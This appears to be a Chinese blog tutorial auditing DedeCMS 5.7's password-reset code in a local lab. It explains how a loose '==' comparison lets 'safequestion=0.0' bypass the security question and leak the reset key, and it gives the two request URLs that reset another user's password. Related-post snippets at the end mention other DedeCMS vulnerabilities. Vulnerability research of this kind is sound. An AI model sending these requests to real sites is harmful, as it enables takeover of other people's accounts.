2. 程式人生 > >dedecms 5.7 任意前臺使用者修改漏洞

dedecms 5.7 任意前臺使用者修改漏洞

阿新 發佈:2018-12-10

一、 啟動環境

1.雙擊執行桌面phpstudy.exe軟體
在這裡插入圖片描述
2.點選啟動按鈕,啟動伺服器環境

二、程式碼審計

1.雙擊啟動桌面Seay原始碼審計系統軟體
在這裡插入圖片描述
2.點選新建專案按鈕,彈出對畫框中選擇(C:\phpStudy\WWW\ dedecms v57),點選確定

漏洞分析

1.進入member/resetpassword.php頁面,將滑鼠滾動到頁面第75行

else if($dopost == "safequestion")
{
    $mid = preg_replace("#[^0-9]#", "", $id);
    $sql = "SELECT safequestion,safeanswer,userid,email FROM #@__member WHERE mid = '$mid'";
    $row = $db->GetOne($sql);
    if(empty($safequestion)) $safequestion = '';

    if(empty($safeanswer)) $safeanswer = '';

    if($row['safequestion'] == $safequestion && $row['safeanswer'] == $safeanswer)
    {
        sn($mid, $row['userid'], $row['email'], 'N');
        exit();
    }
    else
    {
        ShowMsg("對不起,您的安全問題或答案回答錯誤","-1");
        exit();
    }
}

程式首先接收id引數,並用正則將非數字過濾成空,然後利用id的引數拼接成SQL語句進行資料庫查詢。 然後獲取safequestion和safeanswer兩個引數,如果為空直接將引數置為空。
然後將資料庫查詢的結果與問題和答案進行對比,如果成功則進入修改修改密碼過程,問題關鍵也就在於此

2.判斷使用的雙等號進行判斷,雙等號判斷的時候並不會檢測型別 ```

var_dump("0"=='0');

3.如果使用者在註冊使用者的時候並沒有設定問題和答案,程式會自動把問題設定成0,答案為空,這就出現漏洞利用,如果傳輸safequestion=0.0&safeanswer=則可以直接繞過if檢測進入密碼修改部分。讀者現在可能有個問題,為什麼需要傳0.0,為什麼不傳輸0,如果傳輸0的話那不就變成”0”==”0”直接繞過了,但是你需要考慮一個問題,safequestion需要過empty檢測,當empty檢測傳輸過來的值是“0”,直接返回true,if判斷捕捉到為真,會直接將$safequestion = ‘’,而“0”==“”結果為false,則無法繞過判斷。 當驗證成功會進入到sn函式

4.sn函式在member/inc/inc_pwd_functions.php

function sn($mid,$userid,$mailto, $send = 'Y')
{
    global $db;
    $tptim= (60*10);
    $dtime = time();
    $sql = "SELECT * FROM #@__pwd_tmp WHERE mid = '$mid'";
    $row = $db->GetOne($sql);
    if(!is_array($row))
    {
        //傳送新郵件;
        newmail($mid,$userid,$mailto,'INSERT',$send);
    }
    //10分鐘後可以再次傳送新驗證碼;
    elseif($dtime - $tptim > $row['mailtime'])
    {
        newmail($mid,$userid,$mailto,'UPDATE',$send);
    }
    //重新發送新的驗證碼確認郵件;
    else
    {
        return ShowMsg('對不起,請10分鐘後再重新申請', 'login.php');
    }
}

5.程式首先利用函式傳輸過來的mid拼接上SQL語句進入#@__pwd_tmp庫檢測,這個預設就是就為空,查詢以後會進入elseif()判斷過程,再次進入newmail()函式,函式就此檔案中

function newmail($mid, $userid, $mailto, $type, $send)
{
    global $db,$cfg_adminemail,$cfg_webname,$cfg_basehost,$cfg_memberurl;
    $mailtime = time();
    $randval = random(8);
    $mailtitle = $cfg_webname.":密碼修改";
    $mailto = $mailto;
    $headers = "From: ".$cfg_adminemail."\r\nReply-To: $cfg_adminemail";
    $mailbody = "親愛的".$userid.":\r\n您好!感謝您使用".$cfg_webname."網。\r\n".$cfg_webname."應您的要求,重新設定密碼:(注:如果您沒有提出申請,請檢查您的資訊是否洩漏。)\r\n本次臨時登陸密碼為:".$randval." 請於三天內登陸下面網址確認修改。\r\n".$cfg_basehost.$cfg_memberurl."/resetpassword.php?dopost=getpasswd&id=".$mid;
    if($type == 'INSERT')
    {
        $key = md5($randval);
        $sql = "INSERT INTO `#@__pwd_tmp` (`mid` ,`membername` ,`pwd` ,`mailtime`)VALUES ('$mid', '$userid',  '$key', '$mailtime');";
        if($db->ExecuteNoneQuery($sql))
        {
            if($send == 'Y')
            {
                sendmail($mailto,$mailtitle,$mailbody,$headers);
                return ShowMsg('EMAIL修改驗證碼已經發送到原來的郵箱請查收', 'login.php','','5000');
            } else if ($send == 'N')
            {
                return ShowMsg('稍後跳轉到修改頁', $cfg_basehost.$cfg_memberurl."/resetpassword.php?dopost=getpasswd&id=".$mid."&key=".$randval);
            }
        }
        else
        {
            return ShowMsg('對不起修改失敗,請聯絡管理員', 'login.php');
        }
    }

6.程式碼利用random()生成隨機數,然後進入到type==’UPDATE’

elseif($type == 'UPDATE')
    {
        $key = md5($randval);
        $sql = "UPDATE `#@__pwd_tmp` SET `pwd` = '$key',mailtime = '$mailtime'  WHERE `mid` ='$mid';";
        if($db->ExecuteNoneQuery($sql))
        {
            if($send == 'Y')
            {
                sendmail($mailto,$mailtitle,$mailbody,$headers);
                ShowMsg('EMAIL修改驗證碼已經發送到原來的郵箱請查收', 'login.php');
            }
            elseif($send == 'N')
            {
                return ShowMsg('稍後跳轉到修改頁', $cfg_basehost.$cfg_memberurl."/resetpassword.php?dopost=getpasswd&id=".$mid."&key=".$randval);
            }
        }
        else
        {
            ShowMsg('對不起修改失敗,請與管理員聯絡', 'login.php');
        }
    }

然後將ranval隨機值進行md5加密,並更新到dede__pwd_tmp表中。
7.更新完以後流程會進入到send == ‘N’過程,這部有個關鍵問題,會把臨時密碼給洩露出來

return ShowMsg('稍後跳轉到修改頁', $cfg_basehost.$cfg_memberurl."/resetpassword.php?dopost=getpasswd&id=".$mid."&key=".$randval);

如果感覺這個key沒什麼不用請不用著急,馬上進入到getpasswd過程
8.在member/resetpassword.php檔案獲取密碼部分

else if($dopost == "getpasswd")
{
    //修改密碼
    if(empty($id))
    {
        ShowMsg("對不起,請不要非法提交","login.php");
        exit();
    }
    $mid = preg_replace("#[^0-9]#", "", $id);
    $row = $db->GetOne("SELECT * FROM #@__pwd_tmp WHERE mid = '$mid'");
    if(empty($row))
    {
        ShowMsg("對不起,請不要非法提交","login.php");
        exit();
    }
    if(empty($setp))
    {
        $tptim= (60*60*24*3);
        $dtime = time();
        if($dtime - $tptim > $row['mailtime'])
        {
            $db->executenonequery("DELETE FROM `#@__pwd_tmp` WHERE `md` = '$id';");
            ShowMsg("對不起,臨時密碼修改期限已過期","login.php");
            exit();
        }
        require_once(dirname(__FILE__)."/templets/resetpassword2.htm");
    }

這部分有個關鍵過程,資料庫查詢是從__pwd_tmp表中進行查詢。首先程式進行載入模板,讓使用者填寫密碼,填寫完密碼以後會進入到setp==2密碼過程中

elseif($setp == 2)
    {
        if(isset($key)) $pwdtmp = $key;

        $sn = md5(trim($pwdtmp));
        if($row['pwd'] == $sn)
        {
            if($pwd != "")
            {
                if($pwd == $pwdok)
                {
                    $pwdok = md5($pwdok);
                    $sql = "DELETE FROM `#@__pwd_tmp` WHERE `mid` = '$id';";
                    $db->executenonequery($sql);
                    $sql = "UPDATE `#@__member` SET `pwd` = '$pwdok' WHERE `mid` = '$id';";
                    if($db->executenonequery($sql))
                    {
                        showmsg('更改密碼成功,請牢記新密碼', 'login.php');
                        exit;
                    }
                }
            }
            showmsg('對不起,新密碼為空或填寫不一致', '-1');
            exit;
        }
        showmsg('對不起,臨時密碼錯誤', '-1');
        exit;
    }

這部分會比對使用者傳輸的臨時key和資料庫儲存的pwd是否一致,如果一致則會成功修改密碼。

漏洞利用

1.首先訪問

http://192.168.91.136/DedeCMS_v5.7/member/resetpassword.php?id=2&safequestion=0.0&safeanswer=&dopost=safequestion

這步會拿到臨時key
在這裡插入圖片描述
2.然後再訪問

http://192.168.91.136/DedeCMS_v5.7/member/resetpassword.php?dopost=getpasswd&id=2&key=txWda69e

在這裡插入圖片描述

在這裡插入圖片描述

成功進入重置密碼過程。
在這裡插入圖片描述

相關推薦

dedecms 5.7 任意前臺使用者修改漏洞

一、 啟動環境 1.雙擊執行桌面phpstudy.exe軟體 2.點選啟動按鈕,啟動伺服器環境 二、程式碼審計 1.雙擊啟動桌面Seay原始碼審計系統軟體 2.點選新建專案按鈕,彈出對畫框中選擇(C:\phpStudy\WWW\ dedecms v57),點選確定 漏

DedeCMS 5.7 sp1遠端檔案包含漏洞(CVE-2015-4553)

DedeCMS 5.7 sp1遠端檔案包含漏洞(CVE-2015-4553) 一、漏洞描述 該漏洞在/install/index.php(index.php.bak)檔案中,漏洞起因是$$符號使用不當,導致變數覆蓋,以至於最後引起遠端檔案包含漏洞。 二、漏洞影響版本 DeDeCMS < 5.7-

dedecms v5.7 sp2前臺任意使用者登入(包括管理員)

dedecms v5.7 sp2前臺任意使用者登入(包括管理員) 前言 我們繼續來說一下dedecms最新的幾個漏洞,今天是一個前臺任意使用者登入的漏洞,該漏洞結合上一次提到的前臺任意密碼修改漏洞可以直接修改管理員的密碼,剩下的就是找後臺了,廢話不多說,我們開始吧 漏洞版本

CVE-2018-20129:DedeCMS V5.7 SP2前臺檔案上傳漏洞

一、漏洞摘要 漏洞名稱: DedeCMS V5.7 SP2前臺檔案上傳漏洞上報日期: 2018-12-11漏洞發現者: 陳燦華產品首頁: http://www.dedecms.com/軟體連結: http://updatenew.dedecms.com/base-v57/packa

CVE-2018-20129:DedeCMS V5.7 SP2前臺文件上傳漏洞

oba sid img name multi def close -a 代碼 一、漏洞摘要 漏洞名稱: DedeCMS V5.7 SP2前臺文件上傳漏洞上報日期: 2018-12-11漏洞發現者: 陳燦華產品首頁: http://www.dedecms.com/軟件鏈接:

CVE-2018-20129-——DedeCMS V5.7 SP2前臺檔案上傳漏洞

0x01 漏洞概述 Desdev DedeCMS(織夢內容管理系統)是中國卓卓網路(Desdev)科技有限公司的一套開源的集內容釋出、編輯、管理檢索等於一體的PHP網站內容管理系統(CMS)。 Desdev DedeCMS 5.7 SP2版本中的uploads/include/dial

DedeCMS V5.7 SP2前臺檔案上傳漏洞(CVE-2018-20129)

DedeCMS V5.7 SP2前臺檔案上傳漏洞(CVE-2018-20129) 一、漏洞描述 織夢內容管理系統(Dedecms)是一款PHP開源網站管理系統。Dedecms V5.7 SP2版本中的uploads/include/dialog/select_images_post.php檔案存在檔案上傳漏洞

Linux MySQL-5.7 root初始密碼修改

    A RANDOM PASSWORD HAS BEEN SET FOR THE MySQL root USER !

Dedecms 5.7 SP2後臺getshell

Dedecms 5.7 SP2後臺getshell 前言 最近也打算研究研究各大cms的漏洞了,正好看到一篇關於dedecms後臺getshell的文章,所以也自己動手復現一下,這樣以後遇到了也更容易上手。該漏洞涉及的版本是dedecms的最新版吧,下載地址:

dedecms 5.7 sp1版 關於附件上傳後,附件地址回撥失敗的BUG修復

在使用dedecms 5.7 sp1版 時,發現附件上傳後,回撥時會失敗,必須,重新選擇,才能呼叫到上傳的附件,當附件很多時,會很恐怖的。 經過對dedecms5.7的分析,發現是上傳時,沒有傳值導致的。 解決辦法: 1、include目錄下dialog下select_

dedecms 5.7 版採集路徑BUG

使用dedecms 5.7 採集網站資訊時,會發現某些圖片無法採集的錯誤。 經過分析,發現是在對路徑進行處理的BUG。 如源路徑如下:"./2010/2000234234.html" 合成的絕對路徑成:“http://xxxx.com/./2010/20000234234

Mysql 5.7 for Mac永久修改預設字符集(解決亂碼問題)

檢視自己mysql上的預設字符集 1.在終端連線mysql後輸入show variables like '%char%'; 如果是這樣,資料庫就會出現亂碼 永久修改預設字符集為utf-8 1.利用mac的soptlight 找到目錄 /usr/lo

dedecms 5.7呼叫列表時,限制標題長度並顯示完整標題title正確呼叫方法

在使用dedecms5.7 時,當在任何頁面呼叫文章列表時,會發現,預設的標籤或嚮導生成的列表標籤都可以顯示擷取標題,但並不能在title屬性裡標註完整標題,不便於搜尋引擎正確收錄。 而網上許多是更改原始碼辦法,其實,直接通過dedecms標籤中執行指令碼功能是可以實現的,

dedecms 5.7版 管理員許可權bug修復

dedecms 5.7版本 有管理員許可權的bug問題。 即,當你在管理組中,設定好了稽核授權文件許可權,同時又設定了稽核自己釋出文件的許可權時,前一個設定就無效了。 同時,如果設定了稽核全部文件許可權,又有效。 當我使用預設頻道管理員時,就會發現,別人投稿的內容,看不

dedecms5.7 sp2前臺修改任意使用者密碼漏洞(復現)

dedecms5.7 sp2前臺修改任意使用者密碼 前言 其實這個漏洞出來有一段時間了,不算是一個影響特別大的漏洞,畢竟dede是一個內容管理系統,使用者這一塊本來就基本沒有用。該漏洞的精髓就是一個弱型別的比較:’0.0’==’0’ 漏洞版本 該漏洞出

DeDeCMS v5.7 密碼修改漏洞(附PoC)

原文:https://paper.seebug.org/507/ 參考: https://xz.aliyun.com/t/1959 https://xz.aliyun.com/t/1961 安裝 注意安裝之後,註冊會員預設是需要後臺admin稽核的,這裡需要admin在後臺修改一

【程式碼審計】CLTPHP_v5.5.3 前臺任意檔案上傳漏洞分析

  0x00 環境準備 CLTPHP官網:http://www.cltphp.com 網站原始碼版本:CLTPHP內容管理系統5.5.3版本 程式原始碼下載:https://gitee.com/chichu/cltphp 預設後臺地址: http://127.0.0.1/admin/log

DeDeCMS v5.7 密碼修改漏洞

先拿到admin的前臺許可權 1.註冊0000001使用者名稱的賬號 稽核通過(或者設定為不需稽核) 2. 訪問/member/index.php?uid=0000001。 注意只有訪問了/membe

織夢dedecms漏洞修復大全(5.7起)

很多人說dedecms不好,因為用的人多了,找漏洞的人也多了,那麼如果我們能修復的話,這些都不是問題.      好,我們來一個一個修復。修復方法都是下載目錄下該檔案,然後替換或新增部分程式碼,儲存後上傳覆蓋(記得先備份),這樣的好處是防止用懶人包上傳之後因為UTF8和GBK不同產生亂碼,或者修改過這幾個檔案

代碼審計-DedeCMS-V5.7前臺任意用戶密碼重置

漏洞分析 cti question 兩個 int 等於 允許 浮點 rdquo 0x01 漏洞影響 該漏洞允許攻擊者修改任意前臺用戶密碼。 0x02 漏洞利用條件 1,開啟會員模塊 2,攻擊者擁有一個正常的會員賬號 3,目標沒有設置安全問題 0x03